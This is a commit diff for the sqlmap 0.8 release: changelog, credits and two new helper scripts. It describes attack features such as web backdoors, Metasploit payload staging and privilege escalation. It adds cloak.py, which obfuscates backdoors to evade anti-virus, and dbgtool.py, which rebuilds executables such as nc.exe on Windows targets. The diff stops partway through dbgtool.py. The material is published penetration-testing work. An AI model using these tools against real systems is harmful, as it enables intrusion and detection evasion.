sqlmap 0.8 stable!

Generated new user's manual html and pdf
Updated manual
2025-12-06 20:51:31 +00:00 · 2010-03-15 01:17:27 +00:00 · 2010-03-13 22:07:08 +00:00 · 2010-03-13 21:56:38 +00:00 · 2010-03-13 17:30:16 +00:00 · 2010-03-13 17:28:23 +00:00
163 changed files with 24512 additions and 5998 deletions
--- a/doc/AUTHORS
+++ b/doc/AUTHORS
@@ -1,7 +1,7 @@
-Bernardo Damele A. G. (inquis) - project leader, core developer
+Bernardo Damele Assumpcao Guimaraes (inquis) - Lead developer
 <bernardo.damele@gmail.com>
 PGP Key ID: 0x05F5A30F

-Daniele Bellucci (belch) - project founder, initial developer
-<daniele.bellucci@gmail.com>
-PGP Key ID: 0x9A0E8190
+Miroslav Stampar (stamparm) - Developer since version 0.8-rc2
+<miroslav.stampar@gmail.com>
+PGP Key ID: 0xB5397B1B
--- a/doc/ChangeLog
+++ b/doc/ChangeLog
@@ -1,3 +1,236 @@
+sqlmap (0.8-1) stable; urgency=low
+
+  * Support to enumerate and dump all databases' tables containing user
+    provided column(s) by specifying for instance '--dump -C user,pass'.
+    Useful to identify for instance tables containing custom application
+    credentials (Bernardo).
+  * Support to parse -C (column name(s)) when fetching
+    columns of a table with --columns: it will enumerate only columns like
+    the provided one(s) within the specified table (Bernardo).
+  * Support for takeover features on PostgreSQL 8.4 (Bernardo).
+  * Enhanced --priv-esc to rely on new Metasploit Meterpreter's
+    'getsystem' command to elevate privileges of the user running the
+    back-end DBMS instance to SYSTEM on Windows (Bernardo).
+  * Automatic support in --os-pwn to use the web uploader/backdoor to
+    upload and execute the Metasploit payload stager when stacked queries
+    SQL injection is not supported, for instance on MySQL/PHP and
+    MySQL/ASP, but there is a writable folder within the web server
+    document root (Bernardo and Miroslav).
+  * Fixed web backdoor functionality for --os-cmd, --os-shell and --os-pwn
+    useful when web application does not support stacked queries (Bernardo).
+  * Added support to properly read (--read-file) also binary files via
+    PostgreSQL by injecting sqlmap new sys_fileread() user-defined
+    function (Bernardo and Miroslav).
+  * Updated active fingerprint and comment injection fingerprint for
+    MySQL 5.1, MySQL 5.4 and MySQL 5.5 (Bernardo).
+  * Updated active fingerprint for PostgreSQL 8.4 (Bernardo).
+  * Support for NTLM authentication via python-ntlm third party library,
+    http://code.google.com/p/python-ntlm/, --auth-type NTLM (Bernardo).
+  * Support to automatically decode deflate, gzip and x-gzip HTTP
+    responses (Miroslav).
+  * Support for Certificate authentication, --auth-cert option added
+    (Miroslav).
+  * Added support for regular expression based scope when parsing Burp or
+    Web Scarab proxy log file (-l), --scope (Miroslav).
+  * Added option (-r) to load a single HTTP request from a text file
+    (Miroslav).
+  * Added option (--ignore-proxy) to ignore system default HTTP proxy
+    (Miroslav).
+  * Added support to ignore Set-Cookie in HTTP responses,
+    --drop-set-cookie (Miroslav).
+  * Added support to specify which Google dork result page to parse,
+    --gpage to be used together with -g (Miroslav).
+  * Major bug fix and enhancements to the multi-threading (--threads)
+    functionality (Miroslav).
+  * Fixed URL encoding/decoding of GET/POST parameters and Cookie header
+    (Miroslav).
+  * Refactored --update to use python-svn third party library if available
+    or 'svn' command to update sqlmap to the latest development version
+    from subversion repository (Bernardo and Miroslav).
+  * Major bugs fixed (Bernardo and Miroslav).
+  * Cleanup of UDF source code repository,
+    https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack (Bernardo
+    and Miroslav).
+  * Major code cleanup (Miroslav).
+  * Added simple file encryption/compression utility, extra/cloak/cloak.py,
+    used by sqlmap to decrypt on the fly Churrasco, UPX executable and web
+    shells consequently reducing drastically the number of anti-virus
+    softwares that mistakenly mark sqlmap as a malware (Miroslav).
+  * Updated user's manual (Bernardo and Miroslav).
+  * Created several demo videos, hosted on YouTube
+    (http://www.youtube.com/user/inquisb) and linked from
+    http://sqlmap.sourceforge.net/demo.html (Bernardo).
+
+ -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun, 14 Mar 2010 10:00:00 +0000
+
+sqlmap (0.8rc1-1) stable; urgency=low
+
+  * Major enhancement to the Microsoft SQL Server stored procedure
+    heap-based buffer overflow exploit (--os-bof) to automatically bypass
+    DEP memory protection.
+  * Added support for MySQL and PostgreSQL to execute Metasploit shellcode
+    via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an
+    option instead of uploading the standalone payload stager executable.
+  * Added options for MySQL, PostgreSQL and Microsoft SQL Server to
+    read/add/delete Windows registry keys.
+  * Added options for MySQL and PostgreSQL to inject custom user-defined
+    functions.
+  * Added support for --first and --last so the user now has even more
+    granularity in what to enumerate in the query output.
+  * Minor enhancement to save the session by default in
+    'output/hostname/session' file if -s option is not specified.
+  * Minor improvement to automatically remove sqlmap created temporary
+    files from the DBMS underlying file system.
+  * Minor bugs fixed.
+  * Major code refactoring.
+
+ -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Mon, 21 Sep 2009 15:00:00 +0000
+
+sqlmap (0.7-1) stable; urgency=low
+
+  * Adapted Metasploit wrapping functions to work with latest 3.3
+    development version too.
+  * Adjusted code to make sqlmap 0.7 to work again on Mac OSX too.
+  * Reset takeover OOB features (if any of --os-pwn, --os-smbrelay or
+    --os-bof is selected) when running under Windows because msfconsole
+    and msfcli are not supported on the native Windows Ruby interpreter.
+    This make sqlmap 0.7 to work again on Windows too.
+  * Minor improvement so that sqlmap tests also all parameters with no
+    value (eg. par=).
+  * HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and
+    2.6+.
+  * Major bug fix to sql-query/sql-shell features.
+  * Major bug fix in --read-file option.
+  * Major silent bug fix to multi-threading functionality.
+  * Fixed the web backdoor functionality (for MySQL) when (usually) stacked
+    queries are not supported and --os-shell is provided.
+  * Fixed MySQL 'comment injection' version fingerprint.
+  * Fixed basic Microsoft SQL Server 2000 fingerprint.
+  * Many minor bug fixes and code refactoring.
+
+ -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sat, 25 Jul 2009 10:00:00 +0000
+
+sqlmap (0.7rc1-1) stable; urgency=low
+
+  * Added support to execute arbitrary commands on the database server
+    underlying operating system either returning the standard output or not
+    via UDF injection on MySQL and PostgreSQL and via xp_cmdshell() stored
+    procedure on Microsoft SQL Server;
+  * Added support for out-of-band connection between the attacker box and
+    the database server underlying operating system via stand-alone payload
+    stager created by Metasploit and supporting Meterpreter, shell and VNC
+    payloads for both Windows and Linux;
+  * Added support for out-of-band connection via Microsoft SQL Server 2000
+    and 2005 'sp_replwritetovarbin' stored procedure heap-based buffer
+    overflow (MS09-004) exploitation with multi-stage Metasploit payload
+    support;
+  * Added support for out-of-band connection via SMB reflection attack with
+    UNC path request from the database server to the attacker box by using
+    the Metasploit smb_relay exploit;
+  * Added support to read and write (upload) both text and binary files on
+    the database server underlying file system for MySQL, PostgreSQL and
+    Microsoft SQL Server;
+  * Added database process' user privilege escalation via Windows Access
+    Tokens kidnapping on MySQL and Microsoft SQL Server via either
+    Meterpreter's incognito extension or Churrasco stand-alone executable;
+  * Speed up the inference algorithm by providing the minimum required
+    charset for the query output;
+  * Major bug fix in the comparison algorithm to correctly handle also the
+    case that the url is stable and the False response changes the page
+    content very little;
+  * Many minor bug fixes, minor enhancements and layout adjustments.
+
+ -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Wed, 22 Apr 2009 10:30:00 +0000
+
+sqlmap (0.6.4-1) stable; urgency=low
+
+  * Major enhancement to make the comparison algorithm work properly also
+    on url not stables automatically by using the difflib Sequence Matcher
+    object;
+  * Major enhancement to support SQL data definition statements, SQL data
+    manipulation statements, etc from user in SQL query and SQL shell if
+    stacked queries are supported by the web application technology;
+  * Major speed increase in DBMS basic fingerprint;
+  * Minor enhancement to support an option (--is-dba) to show if the
+    current user is a database management system administrator;
+  * Minor enhancement to support an option (--union-tech) to specify the
+    technique to use to detect the number of columns used in the web
+    application SELECT statement: NULL bruteforcing (default) or ORDER BY
+    clause bruteforcing;
+  * Added internal support to forge CASE statements, used only by --is-dba
+    query at the moment;
+  * Minor layout adjustment to the --update output;
+  * Increased default timeout to 30 seconds;
+  * Major bug fix to correctly handle custom SQL "limited" queries on
+    Microsoft SQL Server and Oracle;
+  * Major bug fix to avoid tracebacks when multiple targets are specified
+    and one of them is not reachable;
+  * Minor bug fix to make the Partial UNION query SQL injection technique
+    work properly also on Oracle and Microsoft SQL Server;
+  * Minor bug fix to make the --postfix work even if --prefix is not
+    provided;
+  * Updated documentation.
+
+ -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Tue,  3 Feb 2009 23:30:00 +0000
+
+sqlmap (0.6.3-1) stable; urgency=low
+
+  * Major enhancement to get list of targets to test from Burp proxy
+    (http://portswigger.net/suite/) requests log file path or WebScarab
+    proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project)
+    'conversations/' folder path by providing option -l <filepath>;
+  * Major enhancement to support Partial UNION query SQL injection
+    technique too;
+  * Major enhancement to test if the web application technology supports
+    stacked queries (multiple statements) by providing option
+    --stacked-test which will be then used someday also by takeover
+    functionality;
+  * Major enhancement to test if the injectable parameter is affected by
+    a time based blind SQL injection technique by providing option
+    --time-test;
+  * Minor enhancement to fingerprint the web server operating system and
+    the web application technology by parsing some HTTP response headers;
+  * Minor enhancement to fingerprint the back-end DBMS operating system by
+    parsing the DBMS banner value when -b option is provided;
+  * Minor enhancement to be able to specify the number of seconds before
+    timeout the connection by providing option --timeout #, default is set
+    to 10 seconds and must be 3 or higher;
+  * Minor enhancement to be able to specify the number of seconds to wait
+    between each HTTP request by providing option --delay #;
+  * Minor enhancement to be able to get the injection payload --prefix and
+    --postfix from user;
+  * Minor enhancement to be able to enumerate table columns and dump table
+    entries, also when the database name is not provided, by using the
+    current database on MySQL and Microsoft SQL Server, the 'public'
+    scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle;
+  * Minor enhancemet to support also --regexp, --excl-str and --excl-reg
+    options rather than only --string when comparing HTTP responses page
+    content;
+  * Minor enhancement to be able to specify extra HTTP headers by providing
+    option --headers. By default Accept, Accept-Language and Accept-Charset
+    headers are set;
+  * Minor improvement to be able to provide CU (as current user) as user
+    value (-U) when enumerating users privileges or users passwords;
+  * Minor improvements to sqlmap Debian package files;
+  * Minor improvement to use Python psyco (http://psyco.sourceforge.net/)
+    library if available to speed up the sqlmap algorithmic operations;
+  * Minor improvement to retry the HTTP request up to three times in case
+    an exception is raised during the connection to the target url;
+  * Major bug fix to correctly enumerate columns on Microsoft SQL Server;
+  * Major bug fix so that when the user provide a SELECT statement to be
+    processed with an asterisk as columns, now it also work if in the FROM
+    there is no database name specified;
+  * Minor bug fix to correctly dump table entries when the column is
+    provided;
+  * Minor bug fix to correctly handle session.error, session.timeout and
+    httplib.BadStatusLine exceptions in HTTP requests;
+  * Minor bug fix to correctly catch connection exceptions and notify to
+    the user also if they occur within a thread;
+  * Increased default output level from 0 to 1;
+  * Updated documentation.
+
+ -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Thu, 18 Dec 2008 10:00:00 +0000
+
 sqlmap (0.6.2-1) stable; urgency=low

  * Major bug fix to correctly dump tables entries when --stop is not
@@ -12,6 +245,7 @@ sqlmap (0.6.2-1) stable; urgency=low
    variable) is an integer and, for some reasons, its resumed value from
    the session file is a string or a binary file, the query is executed
    again and its new output saved to the session file;
+  * Minor bug fix in MySQL comment injection fingerprint technique;
  * Minor improvement to correctly enumerate tables, columns and dump
    tables entries on Oracle and on PostgreSQL when the database name is
    not 'public' schema or a system database;
@@ -19,11 +253,10 @@ sqlmap (0.6.2-1) stable; urgency=low
    database name, table name and column(s) are provided;
  * Updated the database management system fingerprint checks to correctly
    identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3;
-  * More user-friendly warnin messages.
+  * More user-friendly warning messages.

 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun,  2 Nov 2008 19:00:00 +0000

-
 sqlmap (0.6.1-1) stable; urgency=low

  * Major bug fix to blind SQL injection bisection algorithm to handle an
@@ -45,7 +278,6 @@ sqlmap (0.6.1-1) stable; urgency=low

 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Fri, 20 Oct 2008 10:00:00 +0000

-
 sqlmap (0.6-1) stable; urgency=low

  * Complete code refactor and many bugs fixed;
@@ -111,7 +343,6 @@ sqlmap (0.6-1) stable; urgency=low

 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Mon,  1 Sep 2008 10:00:00 +0100

-
 sqlmap (0.5-1) stable; urgency=low

  * Added support for Oracle database management system
@@ -159,7 +390,6 @@ sqlmap (0.5-1) stable; urgency=low

 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun,  4 Nov 2007 20:00:00 +0100

-
 sqlmap (0.4-1) stable; urgency=low

  * Added DBMS fingerprint based also upon HTML error messages parsing
@@ -188,14 +418,14 @@ sqlmap (0.4-1) stable; urgency=low
    the remote DBMS;
  * Major improvements in union.UnionCheck() and union.UnionUse()
    functions to make it possible to exploit inband SQL injection also
-    with database comment characters ('--' and '#') in UNION SELECT
+    with database comment characters ('--' and '#') in UNION query
    statements;
  * Added the possibility to save the output into a file while performing
    the queries (-o OUTPUTFILE) so it is possible to stop and resume the
    same query output retrieving in a second time (--resume);
  * Added support to specify the database table column to enumerate
    (-C COL);
-  * Added inband SQL injection (UNION SELECT) support (--union-use);
+  * Added inband SQL injection (UNION query) support (--union-use);
  * Complete code refactoring, a lot of minor and some major fixes in
    libraries, many minor improvements;
  * Reviewed the directory tree structure;
@@ -205,7 +435,6 @@ sqlmap (0.4-1) stable; urgency=low

 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Fri, 15 Jun 2007 20:00:00 +0100

-
 sqlmap (0.3-1) stable; urgency=low

  * Added module for MS SQL Server;
@@ -226,7 +455,6 @@ sqlmap (0.3-1) stable; urgency=low

 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sat, 20 Jan 2007 20:00:00 +0100

-
 sqlmap (0.2-1) stable; urgency=low

  * complete refactor of entire program;
--- a/doc/README.html
+++ b/doc/README.html
--- a/doc/README.pdf
+++ b/doc/README.pdf
--- a/doc/README.sgml
+++ b/doc/README.sgml
--- a/doc/THANKS
+++ b/doc/THANKS
@@ -1,20 +1,75 @@
 == Individuals ==

+David Alvarez <david.alvarez.s@gmail.com>
+    for reporting a bug
+
 Chip Andrews <chip@sqlsecurity.com>
    for his excellent work maintaining the SQL Server versions database
    at SQLSecurity.com and permission to implement the update feature
    taking data from his site

+Otavio Augusto <otavioarj@gmail.com>
+    for reporting a minor bug
+
+Simon Baker <simonb@sec-1.com>
+    for reporting some bugs
+
+Daniele Bellucci <daniele.bellucci@gmail.com>
+    for starting sqlmap project and developing it between July and August
+    2006
+
+Velky Brat <velkybrat@gmail.com>
+    for suggesting a minor enhancement to the bisection algorithm
+
+Jack Butler <fattredd@hotmail.com>
+    for providing me with the sqlmap site favicon
+
+Roberto Castrogiovanni <castrogiovanni.roberto@gmail.com>
+    for reporting a minor bug
+
+Cesar Cerrudo <cesar@argeniss.com>
+    for his Windows access token kidnapping tool Churrasco included in
+    sqlmap tree as a contrib library and used to run the stand-alone
+    payload stager on the target Windows machine as SYSTEM user if the
+    user wants to perform a privilege escalation attack,
+    http://www.argeniss.com/research/TokenKidnapping.pdf
+
 Karl Chen <quarl@cs.berkeley.edu>
    for providing with the multithreading patch for the inference
    algorithm

+Y P Chien <ypchien@cox.net>
+    for reporting a minor bug
+
+Pierre Chifflier <pollux@debian.org> and Mark Hymers <ftpmaster@debian.org>
+    for uploading and accepting the sqlmap Debian package to the official
+    Debian project repository
+
+Ulises U. Cune <ulises2k@gmail.com>
+    for reporting a bug
+
+Alessandro Curio <alessandro.curio@gmail.com>
+    for reporting a minor bug
+
 Stefano Di Paola <stefano.dipaola@wisec.it>
    for suggesting good features

+Dan Guido <dguido@gmail.com>
+    for promoting sqlmap in the context of the Penetration Testing and
+    Vulnerability Analysis class at the Polytechnic University of New York,
+    http://isisblogs.poly.edu/courses/pentest/
+
 Adam Faheem <faheem.adam@is.co.za>
    for reporting a few bugs

+James Fisher <www@sittinglittleduck.com>
+    for providing me with two very good feature requests
+    for his great tool too brute force directories and files names on
+    web/application servers, Dir Buster, http://tinyurl.com/dirbuster
+
+Jim Forster <jimforster@goldenwest.com>
+    for reporting a bug
+
 Rong-En Fan <rafan@freebsd.org>
    for commiting the sqlmap 0.5 port to the official FreeBSD project
    repository
@@ -23,9 +78,23 @@ Giorgio Fedon <giorgio.fedon@gmail.com>
    for suggesting a speed improvement for bisection algorithm
    for reporting a bug when running against Microsoft SQL Server 2005

+Kasper Fons <thefeds@mail.dk>
+    for reporting a bug
+
+Alan Franzoni <alan.franzoni@gmail.com>
+    for helping me out with Python subprocess library
+
+Daniel G. Gamonal <lgrecol@gmail.com>
+    for reporting a minor bug
+
 Ivan Giacomelli <truemilk@insiberia.net>
    for reporting a bug
    for suggesting a minor enhancement
+    for reviewing the documentation
+
+Oliver Gruskovnjak <oliver.gruskovnjak@gmail.com>
+    for reporting a bug
+    for providing me with a minor patch

 Davide Guerri <d.guerri@caspur.it>
    for suggesting an enhancement
@@ -41,9 +110,53 @@ Will Holcomb <wholcomb@gmail.com>
    for his MultipartPostHandler class to handle multipart POST forms and
    permission to include it within sqlmap source code

+Daniel Huckmann <sanitybit@gmail.com>
+    for reporting a couple of bugs
+
+Mounir Idrassi <mounir.idrassi@idrix.net>
+    for his compiled version of UPX for Mac OS X
+
+Dirk Jagdmann <doj@cubic.org>
+    for reporting a typo in the documentation
+
 Luke Jahnke <luke.jahnke@gmail.com>
    for reporting a bug when running against MySQL < 5.0

+Sven Klemm <sven@c3d2.de>
+    for reporting two minor bugs with PostgreSQL
+
+Anant Kochhar <anant.kochhar@secureyes.net>
+    for providing me with feedback on the user's manual
+
+Alexander Kornbrust <ak@red-database-security.com>
+    for reporting a couple of bugs
+
+Krzysztof Kotowicz <kkotowicz@gmail.com>
+    for reporting a minor bug
+
+Nicolas Krassas <krasn@ans.gr>
+    for reporting a bug
+
+Guido Landi <lists@keamera.org>
+    for reporting a couple of bugs
+    for the great technical discussions
+    for Microsoft SQL Server 2000 and Microsoft SQL Server 2005
+    'sp_replwritetovarbin' stored procedure heap-based buffer overflow
+    (MS09-004) exploit development
+    for presenting with me at SOURCE Conference 2009 in Barcelona (Spain)
+    on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on
+    November 20, 2009
+
+Lee Lawson <Lee.Lawson@dns.co.uk>
+    for reporting a minor bug
+
+Nico Leidecker <nico@leidecker.info>
+    for providing me with feedback on a few features
+    for reporting a couple of bugs
+
+Gabriel Lima <pato@bugnet.com.br>
+    for reporting a couple of bugs
+
 Pavol Luptak <pavol.luptak@nethemba.com>
    for reporting a bug when injecting on a POST data parameter

@@ -52,6 +165,10 @@ Michael Majchrowicz <mmajchrowicz@gmail.com>
    for providing really appreciated feedback
    for suggesting a lot of ideas and features

+Ferruh Mavituna <ferruh@mavituna.com>
+    for providing me with ideas on the implementation of a couple of
+    new features
+
 Enrico Milanese <enricomilanese@gmail.com>
    for reporting a bugs when using (-a) a single line User-Agent file
    for providing me with some ideas for the PHP backdoor
@@ -59,9 +176,24 @@ Enrico Milanese <enricomilanese@gmail.com>
 Roberto Nemirovsky <roberto.paes@gmail.com>
    for pointing me out some enhancements

+Markus Oberhumer <markus.oberhumer@jk.uni-linz.ac.at>
+Laszlo Molnar <ml1050@cdata.tvnet.hu>
+John F. Reiser <sales@bitwagon.com>
+    for their great tool UPX (Ultimate Packer for eXecutables) included
+    in sqlmap tree as a contrib library and used mainly to pack the
+    Metasploit Framework 3 payload stager portable executable,
+    http://upx.sourceforge.net
+
+Simone Onofri <simone.onofri@gmail.com>
+    for patching the PHP web backdoor to make it work properly also on
+    Windows
+
 Antonio Parata <s4tan@ictsc.it>
    for providing me with some ideas for the PHP backdoor

+Adrian Pastor <ap@gnucitizen.org>
+    for donating to sqlmap development
+
 Chris Patten <cpatten@sunera.com>
    for reporting a bug in the blind SQL injection bisection algorithm

@@ -88,17 +220,46 @@ Richard Safran <allapplyhere@yahoo.com>
 Tomoyuki Sakurai <cherry@trombik.org>
    for submitting to the FreeBSD project the sqlmap 0.5 port

+Philippe A. R. Schaeffer <schaeff@compuphil.de>
+    for reporting a minor bug
+
+Sven Schluter <sschlueter@netzwerk.cc>
+    for providing with a patch for waiting a number of seconds between
+    each HTTP request
+
+Uemit Seren <uemit.seren@gmail.com>
+    for reporting a minor adjustment when running with python 2.6
+
+Sumit Siddharth <sid@notsosecure.com>
+    for providing me with ideas on the implementation of a couple of
+    features
+
 M Simkin <mlsimkin@cox.net>
    for suggesting a feature

+Konrads Smelkovs <konrads@smelkovs.com>
+    for reporting a few bugs in --sql-shell and --sql-query on Microsoft
+    SQL Server
+
+Marek Stiefenhofer <m.stiefenhofer@r-tec.net>
+    for reporting a bug
+
+Jason Swan <jasoneswan@gmail.com>
+    for reporting a bug when enumerating columns on Microsoft SQL Server
+    for suggesting a couple of improvements
+
 Alessandro Tanasi <alessandro@tanasi.it>
    for extensively beta-testing sqlmap
    for suggesting many features and reporting some bugs
+    for reviewing the documentation
+
+Andres Tarasco <atarasco@gmail.com>
+    for providing me with good feedback

 Efrain Torres <et@metasploit.com>
    for helping me out to improve the Metasploit Framework 3 sqlmap
    auxiliary module and for commiting it on the Metasploit official
-    Subversion repository
+    subversion repository
    for his great Metasploit WMAP Framework

 Sandro Tosi <matrixhasu@gmail.com>
@@ -110,18 +271,48 @@ Bedirhan Urgun <bedirhanurgun@gmail.com>
    for benchmarking sqlmap in the context of his SQL injection
    benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench

+Kyprianos Vasilopoulos <kyprianos.vasilopoulos@gmail.com>
+    for reporting an unhandled connection exception
+
+Anthony Zboralski <anthony.zboralski@bellua.com>
+    for providing me with detailed feedback
+    for reporting a few minor bugs
+    for donating to sqlmap development
+
+dsu <dsu@dsu.com.ua>
+    for reporting a bug
+
 fufuh <fufuh@users.sourceforge.net>
    for reporting a bug when running on Windows

 mariano <marianoso@gmail.com>
    for reporting a bug

+pacman730 <pacman730@users.sourceforge.net>
+    for reporting a bug
+
+Stuffe <stuffe.dk@gmail.com>
+    for reporting a minor bug and a feature request
+
 Sylphid <sylphid.su@sti.com.tw>
    for suggesting some features


 == Organizations ==

+Black Hat team <info@blackhat.com>
+    for the opportunity to present my research on 'Advanced SQL injection
+    to operating system full control' at Black Hat Europe 2009 Briefings on
+    April 16, 2009 in Amsterdam (NL). I unveiled and demonstrated some of
+    the sqlmap 0.7 release candidate version new features during my
+    presentation
+
+Metasploit LLC <msfdev@metasploit.com>
+    for their powerful tool Metasploit Framework 3, used by sqlmap, among
+    others things, to create the payload stager and establish an
+    out-of-band connection between sqlmap and the database server,
+    http://www.metasploit.com/framework
+
 OWASP Board <http://www.owasp.org>
    for sponsoring part of the sqlmap development in the context of OWASP
    Spring of Code 2007
--- a/lib/techniques/inference/init.py
+++ b/lib/techniques/inference/init.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
--- a/extra/cloak/README.txt
+++ b/extra/cloak/README.txt
@@ -0,0 +1,22 @@
+To use cloak.py you need to pass it the original file,
+and optionally the output file name.
+
+Example:
+
+$ python ./cloak.py -i backdoor.asp -o backdoor.asp_
+
+This will create an encrypted and compressed binary file backdoor.asp_.
+
+Such file can then be converted to its original form by using the -d
+functionality of the cloak.py program:
+
+$ python ./cloak.py -d -i backdoor.asp_ -o backdoor.asp
+
+If you skip the output file name, general rule is that the compressed
+file names are suffixed with the character '_', while the original is
+get by skipping the last character. So, that means that the upper
+examples can also be written in the following form:
+
+$ python ./cloak.py -i backdoor.asp
+
+$ python ./cloak.py -d -i backdoor.asp_
--- a/extra/cloak/init.py
+++ b/extra/cloak/init.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,22 +22,4 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
-from lib.core.agent import agent
-from lib.core.data import logger
-from lib.core.data import paths
-from lib.request.connect import Connect as Request
-
-
-def passiveFuzzing():
-    logMsg = "executing passive fuzzing to retrieve DBMS error messages"
-    logger.info(logMsg)
-
-    fuzzVectors = open(paths.FUZZ_VECTORS, "r")
-
-    for fuzzVector in fuzzVectors:
-        fuzzVector = fuzzVector.replace("\r", "").replace("\n", "")
-
-        payload = agent.payload(newValue=fuzzVector)
-        Request.queryPage(payload)
+pass
--- a/extra/cloak/cloak.py
+++ b/extra/cloak/cloak.py
@@ -0,0 +1,93 @@
+#!/usr/bin/env python
+
+"""
+cloak.py - Simple file encryption/compression utility
+Copyright (C) 2010  Miroslav Stampar, Bernardo Damele A. G.
+email(s): miroslav.stampar@gmail.com, bernardo.damele@gmail.com
+
+This library is free software; you can redistribute it and/or
+modify it under the terms of the GNU Lesser General Public
+License as published by the Free Software Foundation; either
+version 2.1 of the License, or (at your option) any later version.
+
+This library is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+Lesser General Public License for more details.
+
+You should have received a copy of the GNU Lesser General Public
+License along with this library; if not, write to the Free Software
+Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import bz2
+import os
+import sys
+
+from optparse import OptionError
+from optparse import OptionParser
+
+def hideAscii(data):
+    retVal = ""
+    for i in xrange(len(data)):
+        if ord(data[i]) < 128:
+            retVal += chr(ord(data[i]) ^ 127)
+        else:
+            retVal += data[i]
+            
+    return retVal
+
+def cloak(inputFile):
+    f = open(inputFile, 'rb')
+    data = bz2.compress(f.read())
+    f.close()
+    
+    return hideAscii(data)
+        
+def decloak(inputFile):
+    f = open(inputFile, 'rb')
+    data = bz2.decompress(hideAscii(f.read()))
+    f.close()
+    
+    return data
+
+def main():
+    usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]
+    parser  = OptionParser(usage=usage, version='0.1')
+
+    try:
+        parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')
+        parser.add_option('-i', dest='inputFile', help='Input file')
+        parser.add_option('-o', dest='outputFile', help='Output file')
+
+        (args, _) = parser.parse_args()
+
+        if not args.inputFile:
+            parser.error('Missing the input file, -h for help')
+
+    except (OptionError, TypeError), e:
+        parser.error(e)
+    
+    if not os.path.isfile(args.inputFile):
+        print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile
+        sys.exit(1)
+    
+    if not args.decrypt:
+        data = cloak(args.inputFile)
+    else:
+        data = decloak(args.inputFile)
+
+    if not args.outputFile:
+        if not args.decrypt:
+            args.outputFile = args.inputFile + '_'
+        else:
+            args.outputFile = args.inputFile[:-1]
+        
+    fpOut      = open(args.outputFile, 'wb')
+    sys.stdout = fpOut
+    sys.stdout.write(data)
+    sys.stdout.close()
+
+
+if __name__ == '__main__':
+    main()
--- a/extra/dbgtool/README.txt
+++ b/extra/dbgtool/README.txt
@@ -0,0 +1,20 @@
+To use dbgtool.py you need to pass it the MS-DOS executable binary file,
+and optionally the output debug.exe script file name.
+
+Example:
+
+$ python ./dbgtool.py -i ./nc.exe -o nc.scr
+
+This will create a ASCII text file with CRLF line terminators called
+nc.scr.
+
+Such file can then be converted to its original portable executable with
+the Windows native debug.exe, that is installed by default in all Windows
+systems:
+
+> debug.exe < nc.scr
+
+To be able to execute it on Windows you have to rename it to end with
+'.com' or '.exe':
+
+> ren nc_exe nc.exe
--- a/extra/dbgtool/dbgtool.py
+++ b/extra/dbgtool/dbgtool.py
@@ -0,0 +1,109 @@
+#!/usr/bin/env python
+
+"""
+dbgtool.py - Portable executable to ASCII debug script converter
+Copyright (C) 2009-2010  Bernardo Damele A. G.
+web: http://bernardodamele.blogspot.com/
+email: bernardo.damele@gmail.com
+
+This library is free software; you can redistribute it and/or
+modify it under the terms of the GNU Lesser General Public
+License as published by the Free Software Foundation; either
+version 2.1 of the License, or (at your option) any later version.
+
+This library is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+Lesser General Public License for more details.
+
+You should have received a copy of the GNU Lesser General Public
+License along with this library; if not, write to the Free Software
+Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import os
+import sys
+import struct
+
+from optparse import OptionError
+from optparse import OptionParser
+
+def convert(inputFile):
+    fileStat = os.stat(inputFile)
+    fileSize = fileStat.st_size
+
+    if fileSize > 65280:
+        print 'ERROR: the provided input file \'%s\' is too big for debug.exe' % inputFile
+        sys.exit(1)
+
+    script     = 'n %s\r\nr cx\r\n' % os.path.basename(inputFile.replace('.', '_'))
